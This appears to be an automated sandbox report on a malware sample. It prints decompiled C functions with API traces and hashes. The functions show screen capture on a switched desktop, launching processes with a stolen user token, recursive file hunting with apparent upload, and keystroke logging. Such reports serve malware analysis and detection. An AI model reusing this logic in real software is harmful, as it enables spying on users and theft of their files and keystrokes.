    Function 00407D61, Relevance: 44.1, APIs: 24, Strings: 1, Instructions: 368libraryloaderwindowCOMMON
    Download Yara Rule
    C-Code - Quality: 43%
    			E00407D61(WCHAR* _a4, char _a8, signed int _a12) {
				void* _v12;
				WCHAR** _v16;
				void* _v20;
				void* _v24;
				_Unknown_base(*)()* _v28;
				struct HDC__* _v32;
				struct tagPOINT _v40;
				_Unknown_base(*)()* _v44;
				intOrPtr _v48;
				_Unknown_base(*)()* _v52;
				_Unknown_base(*)()* _v56;
				_Unknown_base(*)()* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				char _v88;
				_Unknown_base(*)()* _v92;
				intOrPtr _v96;
				char _v124;
				signed int _v128;
				struct HINSTANCE__* _v132;
				struct HINSTANCE__* _v136;
				struct HINSTANCE__* _v140;
				char _v144;
				struct _ICONINFO _v164;
				char _v180;
				intOrPtr _t159;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t173;
				_Unknown_base(*)()* _t174;
				intOrPtr _t176;
				intOrPtr _t178;
				_Unknown_base(*)()* _t179;
				intOrPtr _t180;
				intOrPtr _t182;
				intOrPtr _t184;
				intOrPtr _t186;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t192;
				intOrPtr _t194;
				intOrPtr _t196;
				_Unknown_base(*)()* _t197;
				intOrPtr _t202;
				struct HICON__* _t205;
				signed int _t209;
				intOrPtr _t211;
				void* _t216;
				void* _t239;
				intOrPtr* _t240;
				intOrPtr* _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t261;
				void* _t263;
				unsigned int _t270;
				struct HINSTANCE__* _t271;
				struct HINSTANCE__* _t272;
				struct HINSTANCE__* _t273;
				signed int _t274;
				signed int _t275;
				void* _t281;

				_t159 =  *0x412a64; // 0x246f5a8
				_t271 = LoadLibraryA( *(_t159 + 0x80));
				_t161 =  *0x412a64; // 0x246f5a8
				_v28 = GetProcAddress(_t271,  *(_t161 + 0x90));
				_t163 =  *0x412a64; // 0x246f5a8
				_v72 = GetProcAddress(_t271,  *(_t163 + 0x94));
				_t165 =  *0x412a64; // 0x246f5a8
				_v68 = GetProcAddress(_t271,  *(_t165 + 0x98));
				_t167 =  *0x412a64; // 0x246f5a8
				_v76 = GetProcAddress(_t271,  *(_t167 + 0x9c));
				_t169 =  *0x412a64; // 0x246f5a8
				_v80 = GetProcAddress(_t271,  *(_t169 + 0xa0));
				_t171 =  *0x412a64; // 0x246f5a8
				_v60 = GetProcAddress(_t271,  *(_t171 + 0xa4));
				_t173 =  *0x412a64; // 0x246f5a8
				_t174 = GetProcAddress(_t271,  *(_t173 + 0xa8));
				_v92 = _t174;
				if(_t271 == 0 || _v28 == 0 || _v72 == 0 || _v68 == 0 || _v76 == 0 || _v80 == 0 || _v60 == 0 || _t174 == 0) {
					L52:
					return 0;
				} else {
					_t176 =  *0x412a64; // 0x246f5a8
					_t272 = LoadLibraryA( *(_t176 + 0x84));
					_t178 =  *0x412a64; // 0x246f5a8
					_t179 = GetProcAddress(_t272,  *(_t178 + 0xac));
					_v84 = _t179;
					if(_t272 == 0 || _t179 == 0) {
						goto L52;
					} else {
						_t180 =  *0x412a64; // 0x246f5a8
						_t273 = LoadLibraryA( *(_t180 + 0x88));
						_t182 =  *0x412a64; // 0x246f5a8
						_t258 = GetProcAddress(_t273,  *(_t182 + 0xb0));
						_t184 =  *0x412a64; // 0x246f5a8
						_v16 = GetProcAddress(_t273,  *(_t184 + 0xb4));
						_t186 =  *0x412a64; // 0x246f5a8
						_v12 = GetProcAddress(_t273,  *(_t186 + 0xb8));
						_t188 =  *0x412a64; // 0x246f5a8
						_v20 = GetProcAddress(_t273,  *(_t188 + 0xbc));
						_t190 =  *0x412a64; // 0x246f5a8
						_v44 = GetProcAddress(_t273,  *(_t190 + 0xc0));
						_t192 =  *0x412a64; // 0x246f5a8
						_v52 = GetProcAddress(_t273,  *(_t192 + 0xc4));
						_t194 =  *0x412a64; // 0x246f5a8
						_v56 = GetProcAddress(_t273,  *(_t194 + 0xc8));
						_t196 =  *0x412a64; // 0x246f5a8
						_t197 = GetProcAddress(_t273,  *(_t196 + 0xcc));
						_v64 = _t197;
						if(_t273 == 0 || _t258 == 0 || _v16 == 0 || _v12 == 0 || _v20 == 0 || _v44 == 0 || _v52 == 0 || _v56 == 0 || _t197 == 0) {
							goto L52;
						} else {
							_v24 = 0;
							_v144 = 1;
							_v140 = 0;
							_v136 = 0;
							_v132 = 0;
							if(_a12 != 0 || E00409EE6() != 0) {
								_push(0);
								_push( &_v144);
								_push( &_v88);
								if(_v28() != 0) {
									goto L51;
								}
								_t202 =  *0x412a64; // 0x246f5a8
								_t259 =  *_t258( *((intOrPtr*)(_t202 + 0x8c)), 0, 0, 0);
								_v28 = _t259;
								_v32 = _v16(_t259);
								_v40.y = 0;
								_v40.x = 0;
								_t205 = LoadCursorW(0, 0x7f00);
								_v16 = _t205;
								GetIconInfo(_t205,  &_v164);
								GetCursorPos( &_v40);
								if(_a12 == 0) {
									_t209 = _v12(_t259, 8);
									_t274 = _t209;
									_t260 = _v12(_t259, 0xa);
								} else {
									_t274 = _a12 & 0x0000ffff;
									_t260 = _t274;
								}
								_t211 = _v20(_v28, _t274, _t260);
								_v48 = _t211;
								if(_t211 == 0) {
									L50:
									_t152 =  &_v32; // 0x40570a
									_v64( *_t152);
									_v64(_v28);
									_v72(_v88);
									goto L51;
								} else {
									_t72 =  &_v32; // 0x40570a
									_v96 = _v44( *_t72, _t211);
									_t216 = 0;
									_t263 = 0;
									if(_a12 != 0) {
										_t270 = (_a12 & 0x0000ffff) >> 1;
										_t216 = _v40.x - _t270;
										_v40.x = _v40.x - _t216;
										_t263 = _v40.y - _t270;
										_v40.y = _v40.y - _t263;
									}
									_v52(_v32, 0, 0, _t274, _t260, _v28, _t216, _t263, 0x40cc0020);
									DrawIcon(_v32, _v40.x - _v164.xHotspot, _v40.y - _v164.yHotspot, _v16);
									_push( &_v12);
									_push(0);
									_push(_v48);
									_v12 = 0;
									if(_v68() != 0 || _v12 == 0) {
										L49:
										_v44(_v32, _v96);
										_v56(_v48);
										goto L50;
									} else {
										_push( &_v20);
										_push( &_a12);
										_a12 = 0;
										_v20 = 0;
										if(_v80() != 0) {
											L48:
											_v76(_v12);
											goto L49;
										}
										_t231 = _v20;
										if(_v20 == 0 || _a12 == 0) {
											goto L48;
										} else {
											_t261 = E0040CF2D(_t231);
											if(_t261 == 0) {
												goto L48;
											}
											_v60(_a12, _v20, _t261);
											_t275 = 0;
											if(_a12 <= 0) {
												L40:
												E0040CF40(_t261);
												if(_v20 == 0) {
													_push( &_v24);
													_push(1);
													_push(0);
													if(_v84() == 0 && _v24 != 0) {
														_v128 = 0;
														if(_a8 > 0) {
															E0040CF7C( &_v124, 0x4019e8, 0x10);
															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x64)) = 4;
															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x68)) = 1;
															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x60)) =  &_a8;
															_v128 = _v128 + 1;
														}
														_t239 = _v92(_v12, _v24,  &_v180,  &_v128);
														_t240 = _v24;
														if(_t239 == 0) {
															 *((intOrPtr*)( *_t240 + 0x14))(_t240, 0, 0, 0, 0);
														} else {
															 *((intOrPtr*)( *_t240 + 8))(_t240);
															_v24 = 0;
														}
													}
												}
												goto L48;
											}
											_t108 = _t261 + 0x30; // 0x30
											_v16 = _t108;
											while(lstrcmpiW(_a4,  *_v16) != 0) {
												_v16 = _v16 + 0x4c;
												_t275 = _t275 + 1;
												if(_t275 < _a12) {
													continue;
												}
												goto L40;
											}
											E0040CF7C( &_v180, _t275 * 0x4c + _t261, 0x10);
											_v20 = 0;
											goto L40;
										}
									}
								}
							} else {
								L51:
								return _v24;
							}
						}
					}
				}
			}









































































    0x00407d6a
    0x00407d7e
    0x00407d80
    0x00407d92
    0x00407d95
    0x00407da7
    0x00407daa
    0x00407dbc
    0x00407dbf
    0x00407dd1
    0x00407dd4
    0x00407de6
    0x00407de9
    0x00407dfb
    0x00407dfe
    0x00407e0a
    0x00407e12
    0x00407e17
    0x00408222
    0x00000000
    0x00407e5b
    0x00407e5b
    0x00407e6c
    0x00407e6e
    0x00407e7a
    0x00407e80
    0x00407e85
    0x00000000
    0x00407e93
    0x00407e93
    0x00407ea4
    0x00407ea6
    0x00407eb8
    0x00407eba
    0x00407ecc
    0x00407ecf
    0x00407ee1
    0x00407ee4
    0x00407ef6
    0x00407ef9
    0x00407f0b
    0x00407f0e
    0x00407f20
    0x00407f23
    0x00407f35
    0x00407f38
    0x00407f44
    0x00407f4a
    0x00407f4f
    0x00000000
    0x00407f9b
    0x00407f9b
    0x00407f9e
    0x00407fa8
    0x00407fae
    0x00407fb4
    0x00407fbb
    0x00407fca
    0x00407fd1
    0x00407fd5
    0x00407fdb
    0x00000000
    0x00000000
    0x00407fe1
    0x00407ff1
    0x00407ff4
    0x00408000
    0x00408003
    0x00408006
    0x00408009
    0x00408017
    0x0040801a
    0x00408024
    0x0040802e
    0x0040803b
    0x00408041
    0x00408046
    0x00408030
    0x00408030
    0x00408034
    0x00408034
    0x0040804d
    0x00408050
    0x00408055
    0x0040820b
    0x0040820b
    0x0040820e
    0x00408214
    0x0040821a
    0x00000000
    0x0040805b
    0x0040805c
    0x00408062
    0x00408065
    0x00408067
    0x0040806d
    0x00408079
    0x0040807b
    0x0040807d
    0x00408080
    0x00408082
    0x00408082
    0x00408096
    0x004080b3
    0x004080bc
    0x004080bd
    0x004080be
    0x004080c1
    0x004080c9
    0x004081fc
    0x00408202
    0x00408208
    0x00000000
    0x004080d8
    0x004080db
    0x004080df
    0x004080e0
    0x004080e3
    0x004080eb
    0x004081f6
    0x004081f9
    0x00000000
    0x004081f9
    0x004080f1
    0x004080f6
    0x00000000
    0x00408105
    0x0040810a
    0x0040810e
    0x00000000
    0x00000000
    0x0040811b
    0x0040811e
    0x00408123
    0x00408160
    0x00408161
    0x00408169
    0x00408172
    0x00408176
    0x00408177
    0x0040817d
    0x00408184
    0x0040818a
    0x00408197
    0x004081a2
    0x004081b0
    0x004081bd
    0x004081c1
    0x004081c1
    0x004081d5
    0x004081da
    0x004081dd
    0x004081f3
    0x004081df
    0x004081e2
    0x004081e5
    0x004081e5
    0x004081dd
    0x0040817d
    0x00000000
    0x00408169
    0x00408125
    0x00408128
    0x0040812b
    0x0040813d
    0x00408141
    0x00408145
    0x00000000
    0x00000000
    0x00000000
    0x00408147
    0x00408158
    0x0040815d
    0x00000000
    0x0040815d
    0x004080f6
    0x004080c9
    0x0040821d
    0x0040821d
    0x00000000
    0x0040821d
    0x00407fbb
    0x00407f4f
    0x00407e85

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 00407D78
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407D8C
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407DA1
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407DB6
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407DCB
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407DE0
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407DF5
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407E0A
    • LoadLibraryA.KERNELBASE(?), ref: 00407E66
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407E7A
    • LoadLibraryA.KERNELBASE(?), ref: 00407E9E
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407EB2
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407EC6
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407EDB
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407EF0
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407F05
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407F1A
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407F2F
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407F44
    • LoadCursorW.USER32(00000000,00007F00), ref: 00408009
    • GetIconInfo.USER32(00000000,?), ref: 0040801A
    • GetCursorPos.USER32(?), ref: 00408024
    • DrawIcon.USER32(?,?,?,?), ref: 004080B3
      • Part of subcall function 00409EE6: OpenWindowStationA.USER32(?,00000000,10000000), ref: 00409EFA
      • Part of subcall function 00409EE6: SetProcessWindowStation.USER32(00000000), ref: 00409F07
      • Part of subcall function 00409EE6: OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 00409F1C
      • Part of subcall function 00409EE6: SetThreadDesktop.USER32(00000000), ref: 00409F29
      • Part of subcall function 00409EE6: CloseDesktop.USER32(00000000), ref: 00409F32
      • Part of subcall function 00409EE6: CloseWindowStation.USER32(00000000), ref: 00409F39
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 00408133
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$Load$DesktopLibraryStationWindow$CloseCursorIconOpen$AllocateDrawHeapInfoProcessThreadlstrcmpi
    • String ID: W@
    • API String ID: 1533534080-1911609031
    • Opcode ID: cf2faf7fe43061ffe7c1e75efef07f15dd088ff130b0facf3562832776f72813
    • Instruction ID: bad00d38a9b6f9792e5d397bb277e733b11babb554457f0f7ea104e02bfb41d8
    • Opcode Fuzzy Hash: cf2faf7fe43061ffe7c1e75efef07f15dd088ff130b0facf3562832776f72813
    • Instruction Fuzzy Hash: 3AE11371900218EFCB219FA4DE88AEEBBB9FF08700F14807AF545E6261DB754A51DF58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409CF9, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 175libraryloaderprocessCOMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E00409CF9(long _a4, WCHAR* _a8, WCHAR* _a12) {
				void* _v12;
				void* _v16;
				_Unknown_base(*)()* _v20;
				struct _PROCESS_INFORMATION _v36;
				struct _STARTUPINFOW _v112;
				int _t48;
				signed int _t63;
				struct HINSTANCE__* _t74;
				_Unknown_base(*)()* _t77;
				long _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				void* _t84;
				void* _t85;
				signed int _t86;
				struct HINSTANCE__* _t87;

				_t81 = 0x44;
				_t86 = 0;
				E0040CFFE( &_v112,  &_v112, 0, _t81);
				_v112.cb = _t81;
				_v112.lpDesktop = 0;
				if(_a4 == 0 || ( *0x412af8 & 0x00000001) != 0 || E00409EE6() == 0) {
					L26:
					_t48 = CreateProcessW(_a8, _a12, 0, 0, 0, 0, 0, 0,  &_v112,  &_v36);
					if(_t48 == 0) {
						return _t48;
					}
					goto L27;
				} else {
					_v16 = 0;
					_t82 = GetProcAddress( *0x412c18, "WTSGetActiveConsoleSessionId");
					if(_t82 == 0) {
						L10:
						_a4 = 0;
						if(GetWindowThreadProcessId(GetForegroundWindow(),  &_a4) > 0) {
							_t84 = OpenProcess(0x400, 0, _a4);
							if(_t84 != 0) {
								if(OpenProcessToken(_t84, 0xb,  &_v16) != 0) {
									_t86 = 1;
								}
								CloseHandle(_t84);
							}
						}
						if(_t86 != 1) {
							goto L26;
						} else {
							L16:
							_v12 = 0;
							if(DuplicateTokenEx(_v16, 0x2000000, 0, 1, 1,  &_v12) != 0) {
								_t87 = LoadLibraryA("userenv.dll");
								_v20 = 0;
								_a4 = 0;
								if(_t87 != 0) {
									_t83 = GetProcAddress(_t87, "CreateEnvironmentBlock");
									_v20 = GetProcAddress(_t87, "DestroyEnvironmentBlock");
									if(_t83 != 0) {
										_push(0);
										_push(_v12);
										_push( &_a4);
										if( *_t83() == 0) {
											_a4 = 0;
										}
									}
								}
								_t63 = CreateProcessAsUserW(_v12, _a8, _a12, 0, 0, 0, 0x400, _a4, 0,  &_v112,  &_v36);
								asm("sbb esi, esi");
								_t86 =  ~( ~_t63);
								if(_v20 != 0 && _a4 != 0) {
									_v20(_a4);
								}
								CloseHandle(_v12);
							}
							CloseHandle(_v16);
							if(_t86 == 1) {
								L27:
								CloseHandle(_v36);
								CloseHandle(_v36.hThread);
								return _v36.dwProcessId;
							} else {
								goto L26;
							}
						}
					}
					_t74 = LoadLibraryA("wtsapi32.dll");
					_a4 = _t74;
					if(_t74 != 0) {
						_t85 =  *_t82();
						if(_t85 != 0xffffffff) {
							_t77 = GetProcAddress(_a4, "WTSQueryUserToken");
							if(_t77 != 0) {
								_push( &_v16);
								_push(_t85);
								if( *_t77() != 0) {
									_t86 = 1;
								}
							}
						}
						FreeLibrary(_a4);
						if(_t86 == 1) {
							goto L16;
						}
					}
					goto L10;
				}
			}



















    0x00409d04
    0x00409d0d
    0x00409d0f
    0x00409d14
    0x00409d17
    0x00409d1d
    0x00409eac
    0x00409ec0
    0x00409ec8
    0x00409ee3
    0x00409ee3
    0x00000000
    0x00409d3d
    0x00409d48
    0x00409d51
    0x00409d55
    0x00409d9e
    0x00409da2
    0x00409db4
    0x00409dc5
    0x00409dc9
    0x00409dda
    0x00409dde
    0x00409dde
    0x00409de0
    0x00409de0
    0x00409dc9
    0x00409de9
    0x00000000
    0x00409def
    0x00409def
    0x00409e00
    0x00409e0b
    0x00409e1c
    0x00409e1e
    0x00409e21
    0x00409e26
    0x00409e3a
    0x00409e42
    0x00409e47
    0x00409e49
    0x00409e4a
    0x00409e50
    0x00409e55
    0x00409e57
    0x00409e57
    0x00409e55
    0x00409e47
    0x00409e77
    0x00409e81
    0x00409e83
    0x00409e88
    0x00409e92
    0x00409e92
    0x00409e98
    0x00409e98
    0x00409ea1
    0x00409eaa
    0x00409eca
    0x00409ecd
    0x00409ed6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409eaa
    0x00409de9
    0x00409d5c
    0x00409d62
    0x00409d67
    0x00409d6b
    0x00409d70
    0x00409d7a
    0x00409d82
    0x00409d87
    0x00409d88
    0x00409d8d
    0x00409d8f
    0x00409d8f
    0x00409d8d
    0x00409d82
    0x00409d93
    0x00409d9c
    0x00000000
    0x00000000
    0x00409d9c
    0x00000000
    0x00409d67

    APIs
    • GetProcAddress.KERNEL32(WTSGetActiveConsoleSessionId,00000000), ref: 00409D4B
    • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 00409D5C
    • GetProcAddress.KERNEL32(?,WTSQueryUserToken), ref: 00409D7A
    • FreeLibrary.KERNEL32(?), ref: 00409D93
    • GetForegroundWindow.USER32(?), ref: 00409DA5
    • GetWindowThreadProcessId.USER32(00000000), ref: 00409DAC
    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00409DBF
    • OpenProcessToken.ADVAPI32(00000000,0000000B,?), ref: 00409DD2
    • CloseHandle.KERNEL32(00000000), ref: 00409DE0
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 00409E03
    • LoadLibraryA.KERNEL32(userenv.dll), ref: 00409E16
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00409E2E
    • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 00409E3C
    • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 00409E77
    • CloseHandle.KERNEL32(?), ref: 00409E98
    • CloseHandle.KERNEL32(?), ref: 00409EA1
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00000044,?,?,00000000), ref: 00409EC0
    • CloseHandle.KERNEL32(?), ref: 00409ECD
    • CloseHandle.KERNEL32(?), ref: 00409ED6
      • Part of subcall function 00409EE6: OpenWindowStationA.USER32(?,00000000,10000000), ref: 00409EFA
      • Part of subcall function 00409EE6: SetProcessWindowStation.USER32(00000000), ref: 00409F07
      • Part of subcall function 00409EE6: OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 00409F1C
      • Part of subcall function 00409EE6: SetThreadDesktop.USER32(00000000), ref: 00409F29
      • Part of subcall function 00409EE6: CloseDesktop.USER32(00000000), ref: 00409F32
      • Part of subcall function 00409EE6: CloseWindowStation.USER32(00000000), ref: 00409F39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Close$Process$HandleWindow$AddressOpenProc$DesktopLibraryStation$CreateLoadThreadToken$DuplicateForegroundFreeUser
    • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$WTSGetActiveConsoleSessionId$WTSQueryUserToken$userenv.dll$wtsapi32.dll
    • API String ID: 1454815141-2217652461
    • Opcode ID: 4634a9fd64ae56bdea817414a2c978bb64d770cbe7729a0052fdc8ed12a0ba51
    • Instruction ID: ba2d72c0ec52dc0befdce92057e163bbeeafde8d8eab2dc1d08fda54c98b0b40
    • Opcode Fuzzy Hash: 4634a9fd64ae56bdea817414a2c978bb64d770cbe7729a0052fdc8ed12a0ba51
    • Instruction Fuzzy Hash: C6518072900219BFCF219FA0CD88AEE7F79EF04341F14803AFA15E61A1DB758D518B98
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004040B8, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 153filesynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 85%
    			E004040B8(WCHAR* __ecx, intOrPtr __edx) {
				char _v8;
				void* _v12;
				char _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				WCHAR* _v572;
				WCHAR* _v574;
				struct _WIN32_FIND_DATAW _v620;
				short _v622;
				short _v1140;
				short _v1660;
				void* _t57;
				int _t63;
				long _t67;
				intOrPtr _t69;
				WCHAR** _t70;
				int _t72;
				intOrPtr _t79;
				intOrPtr _t82;
				WCHAR* _t87;
				long _t89;
				intOrPtr _t93;
				signed int _t99;
				intOrPtr _t100;
				char _t101;
				void* _t102;

				_t98 = __edx;
				_t97 = __ecx;
				_v20 = __edx;
				_v24 = __ecx;
				PathCombineW( &_v1140, __ecx, "*");
				_v622 = 0;
				_t57 = FindFirstFileW( &_v1140,  &_v620);
				_v12 = _t57;
				if(_t57 != 0xffffffff) {
					__eflags = 0;
					do {
						__eflags = _v620.cFileName - 0x2e;
						if(_v620.cFileName != 0x2e) {
							L7:
							__eflags = _v620.dwFileAttributes & 0x00000010;
							if((_v620.dwFileAttributes & 0x00000010) == 0) {
								 *0x412dd4(0x4126c8);
								_t99 = 0;
								__eflags =  *0x4126e0; // 0x0
								if(__eflags <= 0) {
									L21:
									 *0x412dd8(0x4126c8);
									Sleep(0x14);
									L22:
									__eflags =  *0x4126e0; // 0x0
									if(__eflags <= 0) {
										break;
									}
									goto L23;
								} else {
									goto L11;
								}
								do {
									L11:
									_t69 =  *0x4126e4; // 0x0
									_t70 = _t69 + _t99 * 4;
									__eflags =  *_t70;
									if( *_t70 == 0) {
										goto L16;
									}
									__eflags = _v620.nFileSizeHigh;
									if(_v620.nFileSizeHigh != 0) {
										goto L16;
									}
									_t72 = PathMatchSpecW( &(_v620.cFileName),  *_t70);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L16;
									}
									PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
									_t101 = _v620.nFileSizeLow;
									_t79 =  *0x412a64; // 0x246f5a8
									_v8 = 4;
									_v16 = 0;
									__eflags = E00407559(0x80000001,  *((intOrPtr*)(_t79 + 0x168)),  &_v1140, 0,  &_v16,  &_v8);
									if(__eflags == 0) {
										L18:
										_t82 =  *0x412a64; // 0x246f5a8
										wnsprintfW( &_v1660, 0x103,  *(_t82 + 0x16c), _v620.nFileSizeLow,  &(_v620.cFileName));
										_t102 = _t102 + 0x14;
										_t87 = E00410F35(_t97, _t98, __eflags,  &_v1140, 0,  &_v1660);
										__eflags = _t87;
										if(_t87 != 0) {
											_v8 = _v620.nFileSizeLow;
											_t93 =  *0x412a64; // 0x246f5a8
											E004075A2(0x80000001,  *((intOrPtr*)(_t93 + 0x168)),  &_v1140, 4,  &_v8, 4);
										}
										_t89 = WaitForSingleObject( *(_v20 + 4), 0x2710);
										__eflags = _t89;
										if(_t89 == 0) {
											goto L24;
										} else {
											goto L21;
										}
									}
									__eflags = _t101 - _v16;
									if(__eflags != 0) {
										goto L18;
									}
									L16:
									_t99 = _t99 + 1;
									__eflags = _t99 -  *0x4126e0; // 0x0
								} while (__eflags < 0);
								goto L21;
							}
							PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
							_t100 = _v20;
							_t67 = WaitForSingleObject( *(_t100 + 4), 0x3e8);
							__eflags = _t67;
							if(_t67 == 0) {
								break;
							}
							_t98 = _t100;
							_t97 =  &_v1140;
							E004040B8( &_v1140, _t100);
							goto L22;
						}
						__eflags = _v574;
						if(_v574 == 0) {
							goto L22;
						}
						__eflags = _v574 - 0x2e;
						if(_v574 != 0x2e) {
							goto L7;
						}
						__eflags = _v572;
						if(_v572 == 0) {
							goto L22;
						}
						goto L7;
						L23:
						_t63 = FindNextFileW(_v12,  &_v620);
						__eflags = _t63;
					} while (_t63 != 0);
					L24:
					FindClose(_v12);
					return 1;
				}
				return 0;
			}





























    0x004040b8
    0x004040b8
    0x004040d1
    0x004040d4
    0x004040d7
    0x004040df
    0x004040f4
    0x004040fa
    0x00404100
    0x00404109
    0x0040410b
    0x0040410b
    0x00404113
    0x00404139
    0x00404139
    0x00404140
    0x00404189
    0x0040418f
    0x00404191
    0x00404197
    0x004042b2
    0x004042b7
    0x004042bf
    0x004042c5
    0x004042c5
    0x004042cb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040419d
    0x0040419d
    0x0040419d
    0x004041a2
    0x004041a5
    0x004041a7
    0x00000000
    0x00000000
    0x004041a9
    0x004041af
    0x00000000
    0x00000000
    0x004041ba
    0x004041c0
    0x004041c2
    0x00000000
    0x00000000
    0x004041d5
    0x004041db
    0x004041f1
    0x004041fc
    0x00404208
    0x00404210
    0x00404212
    0x0040422b
    0x00404238
    0x0040424f
    0x00404255
    0x00404267
    0x0040426c
    0x0040426e
    0x00404278
    0x00404288
    0x00404298
    0x00404298
    0x004042a8
    0x004042ae
    0x004042b0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004042b0
    0x00404214
    0x00404217
    0x00000000
    0x00000000
    0x00404219
    0x00404219
    0x0040421a
    0x0040421a
    0x00000000
    0x00404226
    0x00404153
    0x00404159
    0x00404164
    0x0040416a
    0x0040416c
    0x00000000
    0x00000000
    0x00404172
    0x00404174
    0x0040417a
    0x00000000
    0x0040417a
    0x00404115
    0x0040411c
    0x00000000
    0x00000000
    0x00404122
    0x0040412a
    0x00000000
    0x00000000
    0x0040412c
    0x00404133
    0x00000000
    0x00000000
    0x00000000
    0x004042cd
    0x004042d7
    0x004042dd
    0x004042dd
    0x004042e5
    0x004042e8
    0x00000000
    0x004042ee
    0x00000000

    APIs
    • PathCombineW.SHLWAPI(?,?,00401040), ref: 004040D7
    • FindFirstFileW.KERNEL32(?,?,?,00401040), ref: 004040F4
    • PathCombineW.SHLWAPI(?,?,0000002E,?,00401040), ref: 00404153
    • WaitForSingleObject.KERNEL32(?,000003E8,?,00401040), ref: 00404164
    • FindNextFileW.KERNEL32(?,00000010,?,00401040), ref: 004042D7
    • FindClose.KERNEL32(?,?,00401040), ref: 004042E8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Find$CombineFilePath$CloseFirstNextObjectSingleWait
    • String ID: .$.
    • API String ID: 3352328711-3769392785
    • Opcode ID: 470571a41d0df8c2e0b2c136e64cf63f21a053f071b5516177947fd293491bca
    • Instruction ID: cf7a5b052dfe51dc5fe498fc60605e172cc81fd168000d96ea4ad3b343d47568
    • Opcode Fuzzy Hash: 470571a41d0df8c2e0b2c136e64cf63f21a053f071b5516177947fd293491bca
    • Instruction Fuzzy Hash: 31513DB1A00219EFCF20DFA4DD48AEA77B8FB44344F0041FAA609F21A0D7759A95DF58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004056B3, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109keyboardCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004056B3(void* __edx, int _a4) {
				char _v520;
				short _v524;
				char _v780;
				short _v782;
				short _v784;
				char _v785;
				void* __edi;
				void* __esi;
				int _t23;
				intOrPtr _t35;
				long _t39;
				intOrPtr _t40;
				void* _t50;
				void* _t51;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t67;

				_t51 = __edx;
				_t23 = _a4;
				if(_t23 == 0) {
					L15:
					return _t23;
				}
				_t23 =  *(_t23 + 4);
				if(_t23 != 0x201) {
					if(_t23 != 0x100) {
						goto L15;
					}
					_t23 = GetKeyState(0x11);
					if((0x80000000 & _t23) != 0) {
						goto L15;
					}
					_t23 = GetKeyState(0x12);
					if((0x80000000 & _t23) != 0) {
						goto L15;
					}
					L10:
					_v782 = 0;
					_t23 = GetKeyboardState( &_v780);
					if(_t23 != 0) {
						_t23 = ToUnicode( *(_a4 + 8), 0,  &_v780,  &_v784, 1, 0);
						if(_t23 == 1) {
							_v785 = 0;
							_t23 = WideCharToMultiByte(0, 0,  &_v784, 1,  &_v785, 1, 0, 0);
							if(_t23 != 0 && _v785 != 0) {
								_t23 = E00405452(_t50, 1,  &_v785);
							}
						}
					}
					goto L15;
				}
